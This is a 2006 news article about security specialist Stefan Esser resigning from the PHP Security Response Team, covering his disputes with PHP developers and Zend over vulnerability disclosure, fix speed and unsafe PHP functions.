13 December 2006, 20:57

Security specialist leaves PHP security team

Stefan Esser, PHP security specialist and member of the official PHP Security Response Team has, he says, had enough - in his blog he has announced his immediate resignation from the PHP Security Response Team. He states that he has various reasons for doing so, the most important of which is that his attempt to make PHP safer "from the inside" is futile. According to Esser, as soon as you try to criticise PHP security, you become persona-non-grata in the security team. In addition many of his suggestions were ignored because the developers considered Esser's choice of words, too abrasive. He says that he had stopped counting the number of times he was called a traitor when he published a bug report on a vulnerability in PHP.

Esser wants to continue to publish his reports without worrying about whether or not a patch is available. He no longer wishes to cover up the slowness of the reaction time between discovery of a vulnerability and publication of this information. It is reasonable to expect that he will be publishing substantially more vulnerabilities in PHP in the future.

The disagreement between Esser and the PHP team seems to be particularly inflamed by the matter of how best to improve the security of PHP. While Esser feels that certain PHP functions are intrinsically unsafe (for example allow_url_fopen/allow_url_include) and should therefore be revised, many developers, including PHP specialists Zend, think that the security problems in PHP applications have simply been caused by inexperienced programmers. Zeev Suraski, Zend's CTO, told heise Security that the majority of web applications are programmed in PHP. The shear volume could give the impression that PHP is intrinsically unsafe.

Suraski expressed his regret at Esser's resignation from the security team and hoped that Esser might come to his senses and return. He also hoped that Esser would not turn against the PHP project. The "Month of PHP security bugs" proposed by Esser for 2007 would harm the project. In the past he had made a substantial contribution to improving the implementation of PHP and to making it more secure - even if there had been differences of opinion over methods. It is not the case, however, that the PHP project is trying to conceal the fact that PHP has been implemented in a very unsafe way. But Suraski does think it preferable to produce a patch before publishing any bug report.

This approach is too slow for Esser. In his opinion too much time has been elapsing between bug reports and bug fixes. According to his observations only three people on the PHP security mailing list are really fixing bugs. Additionally bugs were sometimes not correctly fixed or were re-introduced. This was often not noticed because there was no test-rig for exploits and the idea of having one was categorically rejected. Esser told heise Security "At the very most it was permissible to deal with a bug in a test-rig which did not directly test for exploits".

He says that it is true that there are too many inexperienced programmers, however there are also far too many peripheral conditions, which need to be taken into account in order to ensure that an application was not insecure. In his view it is also irresponsible to cease proper support for the PHP4 tree. The current CVS version contains bug fixes for security vulnerabilities, for which users have been waiting for six months. Esser writes in his e-mail "Plus, other vulnerabilities have been fixed, for which either an advisory has not yet been published by a third party, or which has been found and fixed by a PHP developer and for which therefore, as ever in these cases, hardly any information has been released".